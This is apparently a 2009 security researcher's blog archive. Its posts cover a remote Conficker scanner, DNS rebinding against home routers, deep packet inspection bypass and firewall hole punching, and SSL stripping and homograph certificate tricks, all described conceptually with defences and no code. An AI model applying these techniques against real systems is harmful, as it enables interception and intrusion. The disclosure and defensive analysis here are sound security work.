Taming Conficker, The Easy Way

March 30, 2009 4 comments

We may not know what the Conficker authors have in store for us on April 1st, but I doubt many network administrators want to find out.  Maybe they don’t have to:  I’ve been working with the Honeynet Project’s Tillmann Werner and Felix Leder, who have been digging into Conficker’s profile on the network.  What we’ve found is pretty cool:  Conficker actually changes what Windows looks like on the network, and this change can be detected remotely, anonymously, and very, very quickly.  You can literally ask a server if it’s infected with Conficker, and it will tell you.  Tillmann and Felix have their own proof of concept scanner, and with the help of Securosis‘ Rich Mogull and the multivendor Conficker Working Group, enterprise-class scanners should already be out from Tenable (Nessus), McAfee/Foundstone, nmap, ncircle, and Qualys.

We figured this out on Friday, and got code put together for Monday.  It’s been one heck of a weekend.

The technical details are not complicated — Conficker, in all its variants, makes NetpwPathCanonicalize() work quite a bit differently than either the unpatched or the patched MS08-067 version — but I’ll let Tillmann and Felix describe this in full in their “Know Your Enemy” paper, due out any day now with all sorts of interesting observations about this annoying piece of code.  (We didn’t think it made sense to hold up the scanner while finishing up a few final edits on the paper.)

Categories: Security

Infrastructure Attacks: A Growing Concern

March 24, 2009 1 comment

So the general theme of my talks for the last year has been about the extraordinary damage that infrastructure attacks are capable of. I do believe it’s possible to bolster endpoint security — to achieve end-to-end trust — but it will take more than what we’re doing right now. It will take, somewhat to my surprise, DNSSEC.

It will also take treating infrastructure itself with more care, and more security due diligence, than we do today. Forget patching infrastructure. When my DNS bug hit, a remarkable number of sites suddenly found themselves simply identifying the DNS servers they were dependent on. We can do better. We need better operational awareness of our infrastructure. And we need infrastructure, over time, to become a lot safer and easier to update. That means automatic update isn’t just for desktops anymore, that firmware patches need to have a much higher likelihood of not bricking the hardware, and possibly, that we need fewer builds with more testing for the new production environment, that is increasingly under attack.

The reality is the bad guys are out there, and they’re learning.  Just as attackers moved from servers to clients, some are moving from compromising a single client to compromising every client behind vulnerable infrastructure.  Psyb0t, a worm that has been bouncing around since January, was recently found by DroneBL and reported on by Ryan Naraine.  It targets home routers, and early estimates are that it has hit over 100K of them.  Home routers are a wonderful, enabling technology for users, and even for security, they carried us through 2001-2004′s years of widespread server side vulnerabilities.  So we shouldn’t be too down on them.  But they do have vulnerabilities, and they are getting exposed.

This, of course, is something quite a few people have been talking about.  CSRF — Cross Site Request Forgery — attacks have affected everyone from Linksys to Motorola to Siemens to Cisco.  More problematically, the DNS Rebinding attacks discussed by myself, David Byrne, Dan Boneh/Adam Barth/Collin Jackson, and others in 2007 still affect home routers. And I’m not talking about Java and Flash sockets, like at this year’s CanSecWest talk.  I’m talking about simply running rebinding against the browser itself, to make a remote website and a local router appear to be the same name, thus able to script against one another.

This should sound familiar, because this is what I discussed at RSA last year.

Yep, that still works, in all browsers. It has to. Moral of the video, please don’t have a default password on your home router — and, maybe, home routers can someday only allow default passwords to work 10 minutes after power cycling.

Why can’t this be fixed in the browser? Now that’s a fascinating question, which we’ll discuss in another blog post.

Categories: Security

Cansec Slides, Now With More TCP NAT2NAT Goodness

March 21, 2009 Leave a comment

Slides from Cansec, replete with TCP NAT2NAT goodness.

(In my defense, this trick is way less hideous than my 2001 IP TTL game!)

Staring Into The Abyss

Categories: Security

Staring Into The Abyss, A Bit Before Cansec

March 9, 2009 1 comment

I’m just going to come out and say it:  I miss packet craft.  Sure, we can always pull out Scapy, and slap amusing packets together, but everything interesting is always at the other layers.

Or is it?

For CanSecWest this year, I thought it’d be interesting to take a look at the realm of Deep  Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then…well, sort of stopped.  So, in this year’s CanSecWest paper, “Staring Into The Abyss:  Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection” (DOC, PDF), I’m taking another crack at the realm — and I’m seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.

Ah, but here’s where I need some help.  I’ve worked pretty closely with Robert Auger from Paypal, who just published his own paper, “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”.  We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we’ve kind of forgotten just how much can be done against Active FTP Application Layer Gateways.

So, if I may ask, take a look, check out my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation.  Here’s the full summary, to whet your appetite:

DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.

Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.

First, firewalls and NATs — the most widely deployed packet inspectors on the Internet today — can still be made to open firewall holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP. We extend older work by integrating mechanisms for acquiring the correct internal IP address of a client, necessary for triggering many inspection engines, we survey other protocols such as SIP and H.323 that have their own inspection engines, and we explore better strategies for triggering these vulnerabilities without socket engines from browser plugins. We also explore a potentially new mechanism, “Window Dribbling”, that allows an HTTP POST from a browser to be converted into a full bidirectional conversation by only allowing a remote sender to “dribble” a fixed number of bytes per segment.

Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).

Third, and most interestingly, we find that active DPI’s — those that actually alter the flow of traffic between a client and a server — all seem to expose subtly different parsers and handlers for the protocols they manipulate. These variations of behavior can be remotely fingerprinted, allowing an attacker to identify DPI platforms so as to correctly target his attacks. This capability, understood particularly in light of Felix Lindner’s recent work on generic attacks against Cisco infrastructure, underscores the need for both DPI vendors to test their platforms extensively, and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.

For remediation purposes, we recommend two lines of defense – one policy, one technical. As a matter of policy, we find the most important recommendation of this paper that industry reconsiders patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but aren’t closely tracking the equipment that binds endpoints together – despite their ever increasing intelligence. This is as much a recommendation to vendors – to build patches quickly, and to code audit and fuzz with software from companies like Breakingpoint and Codenomicon – as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper does recognize the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have particular need for correctness. There have been incidents in the past that have led to security vulnerability across entire ISPs.

On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to that which existed in 2001 is not leading to more stable or more secure networks. We explore a solution that potentially allow firewalls to integrate socket policies into their ALG’s, encouraging plugin developers to eventually join in with browser manufacturers and build a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which will prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to access their web interfaces from the Internet, and that this exposure can be repaired by tying default password effectiveness to either a button on the device or a power cycle.

The firewall fingerprinter should be online shortly, with source code for you to play with as well.  Thanks!

(Incidentally, yep, Source is this week, and I have something rather different in store for that event.  The times, they are busy.)

Categories: Security

Virtual Hoff

February 28, 2009 Leave a comment

So Crystal and the rest of Workhabit just threw another Unconference:  Cloudcamp Seattle.  I’m actually pretty impressed with the crowd — there’s representation from Amazon EC2, Windows Azure, and RightScale (who, non-ironically, have actually implemented Cloud on Cloud).   Crystal asked if I’d be willing to do a Cloud Security talk.  The Man couldn’t fly out, but here’s my thoughts on the cloud.  Quick summary:  There are ugly engineering (and procedural) issues we can’t actually ignore, mainly around escaping the management layer and the problem of intrusion disclosure, but:

a) This is such a superior way to deploy software, that I expect to see the necessary modifications to hardware and authentication technologies so as to obviate the threats in this deck, and
b) Private clouds are such an obvious value add that they’ll carry us through until the modifications are implemented.

I’ll throw video on as well if people want.  Enjoy!

When Irresistable Forces Attack

Categories: Security

Black Hat Federal slides

February 20, 2009 2 comments

I’ll write more detailed commentary later, but here are the slides I recently presented at Black Hat.

2008 And The New (Old) Nature Of Critical Infrastructure

Categories: Security

Leetness Not Actually Required For Pwnage

February 19, 2009 23 comments

I do need to make a post about DNSSEC at some point in the near future.  But for now, I’d like to deal with the more immediate issue:  Moxie’s SSL break.

You’ll note that’s not in quotes.  There’s a pretty decent temptation to say Moxie’s attacks don’t “count”.  Some of this comes from the fact that at the end of the day, these are his three attacks:

First, that when a site attempts to upgrade from HTTP to HTTPS, he can suppress the upgrade — possibly throwing in a “Lock” favicon which might trick the user.
Second, that there are a surprising number of online banks that still place a HTTPS form on an HTTP page, which can of course be downgraded (or as I pointed out, sniffed via injected Javascript).
Finally, Firefox‘s (not IE’s) defenses against Eric Johannsen’s IDN vulnerability could be bypassed by registering a domain and acquiring a wildcard cert in .cn.

The first two attacks have been discussed fairly extensively, while the third works in only one of the browsers.  So there’s some grumbling.  Lets talk about that.

When I gave my DNS Cache Poisoning talk last year, I devoted quite a few slides to the failings of SSL.  To put it simply, there’s a reason I didn’t consider SSL a sufficient defense for DNS Cache Poisoning. Indeed, the fact that the 302 Redirect could be replaced with a 200 OK — replacing https://www.paypal.com with http://www.paypal.com — is right there on the first slide.  (His favicon trick is neat though.)  And a few slides later, I ended up quoting my 2006 talk with respect to online banks and their tragic use of weak security forms, replete with cutesy “lock” icons.  Obviously I didn’t discover either of these attacks; they, and the rest of the litany of weaknesses described in my 2008 deck, have long been the sort of failings in SSL that we’ve all known are pretty deeply problematic.

But, at least the way I look at it, Moxie’s talk wasn’t about some “l33t new protocol flaw” in SSL.  He’s traveled that ground — in 2002, his finding that a certificate for http://www.badguy.com could sign another certificate for http://www.bank.com via the non-enforcement of Basic Constraints is about as “l33t” as it gets.  That’s been fixed for years though.  This was instead a fairly searing critique about Security UI.  Moxie introduced (to me anyway) the concept of Positive vs. Negative Feedback.  Negative Feedback systems occur when the browser detects an out-and-out failure in the cryptography, and posits an error to the user.  In response to the New Zealand bank data, in which 199 of 200 users ignored a negative prompt, browsers have been getting crazier and crazier about forcing users to jump through hoops in order to bypass a certificate error.  The new negative errors are at the point where it is in fact easier to “balk” — to stop a web transaction, and move onto something else.

So Moxie’s putting his energy on the old positive feedback attacks — simply disabling the security, and seeing if anyone notices.  And here he shows up with some pretty astonishing data:  Nobody noticed.  To be specific, absolutely 0% of users presented with missing encryption on important web sites, being asked to provide sensitive financial data to those websites, refused on the basis of missing security.

Wow.  0%.  Seriously.

Why don’t users “get it”?

The most heartbreaking thing I think from Moxie’s entire deck is where he shows off what his attack does to Paypal, on an older browser.  Paypal, more than most sites, has some paranoid, whip-smart engineers who really want to ship the most secure web experience possible for their service.  As such, they have what’s probably the single most widely deployed SSL-only site.  100% of Paypal can, and must, be retrieved over SSL.

Unless there’s a bad guy in the way, faking the real Paypal content over HTTP.  Then Paypal looks just like your bank.

That the insecurity of other sites would train users to not expect security on yours, was pretty cool (if sad) to see.

Where I do think things went a little off the tracks was when Moxie talked about his (pretty elegant) extension of Eric Johannsen’s IDN attacks.   IDNs, or Internationalized Domain Names, exist to allow other languages the ability to have web sites in their native character sites, rather than shunting everything into ASCII.  What Eric did in 2005 was show that he could acquire a certificate for http://www.paypal.com — with the a being the Cyrillic a — and thus acquire the “lock”, apparently linked to a near-pixel-perfect rendering of Paypal’s address bar.  These so-called “Homograph” attacks were dealt with by locking down the rendering of other character sets in the address bar.

The problem — and it’s worth exploring, because it reflects just how tricky it is to satisfy all those other demands besides security — is that the trivial way to lock down the address bar, to simply ban Chinese and Cyrillic and everything else — has some pretty serious geopolitical implications.  What, America gets to have its domain names, and China doesn’t?  What’s up with that?  Different browsers have dealt with this problem in different ways.  I believe the way IE has handled this is to ask the operating system what language the OS is in, and allow Chinese browsers to view Chinese characters, Russian browsers to view Cyrillic characters, and so on.  It appears Firefox handled this instead by saying that domains in *.cn may contain Chinese characters, domains in *.ru may contain Cyrillic characters, and so on.

But nothing stops Moxie, an American, from registering a *.cn domain, acquiring a *.ijjk.cn certificate, and using the Chinese character that looks exactly like a slash to make a fake http://www.bankofwhatever.com/foo/bar/foo.ijjk.cn domain.  It’s a cute trick.

It’s also precisely what EV certificates exist to solve.

There’s an amazing amount of confusion around Extended Validation — EV.  I can’t claim innocence here; I myself was pretty clueless about why they exist until fairly recently.  Here’s the deal:  Forget crazy tricks with chinese characters — bad guys have been registering names along the lines of http://www.bank-of-whatever.com or http://www.bankofwhateverinc.com or http://www.bankofamerica.com.xyzy.com for years, and then acquiring certificates for those names.  Moxie’s attack is neat, but once you hit the semantic space, there’s practically an unlimited number of potential namespace collisions. EV exists, pretty much exclusively, to deal with the problem of these semantic collisions.  It does four things:

1) It requires a solid certificate chain, as opposed to one containing MD5.
2) It requires a human lawyer, versed in the laws and language of a particular jurisdiction, to determine the implied corporate relationship from the domain name and declare it valid.
3) It applies a green background to the entire address bar (IE) or the leftmost side (Firefox), increasing the amount of “positive feedback” (as Moxie puts it) the user is hoped to demand
4) It explicitly inserts the human-lawyer-approved brand identity to the address bar, replete with a jurisdictional declaration.  This also is there to add more positive feedback.

That’s what EV is for. It’s not at all there to deal with domain validated certs for http://www.bankofwhatever.com being incorrectly issued — see Adam Barth and Collin Jackson’s work in their paper,  “Beware of Finer Grained Origins”. It’s not at all, as Moxie said in his talk, “Just the validation that CA’s should have been doing already”.  Verisign et al have built an extensive, new positive feedback layer to deal with real world phishing attacks that, while not as elegant as Moxie’s Chinese Slash, were no less effective.

The real question, in the wake of Moxie’s work, is do we have data that shows users notice the missing green bar, and the missing brand identity?  Or, even with EV sites, do users still ignore the missing security markings?  I’m looking forward to seeing the data.

Categories: Security
Follow

Get every new post delivered to your Inbox.

Join 474 other followers